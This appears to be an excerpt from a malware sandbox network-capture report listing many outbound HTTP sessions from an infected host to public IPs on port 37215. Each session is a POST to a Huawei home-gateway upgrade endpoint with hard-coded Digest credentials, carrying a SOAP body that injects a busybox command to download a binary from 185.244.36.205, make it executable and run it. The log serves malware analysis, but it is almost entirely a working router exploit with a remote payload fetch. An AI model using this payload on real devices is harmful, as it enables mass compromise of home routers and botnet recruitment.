                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              145192.168.2.153989845.117.236.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036066055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              146192.168.2.1555352181.70.60.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036067009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              147192.168.2.155163845.46.150.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036075115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              148192.168.2.154556631.255.153.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036077023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              149192.168.2.155656237.111.158.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036128044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              150192.168.2.1557304122.98.3.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036204100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              151192.168.2.1556332180.113.68.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036211014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              152192.168.2.1540506138.148.33.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036253929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              153192.168.2.155211437.165.244.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036257029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              154192.168.2.154792031.206.48.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036278963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              155192.168.2.1534108181.66.91.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.036298990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
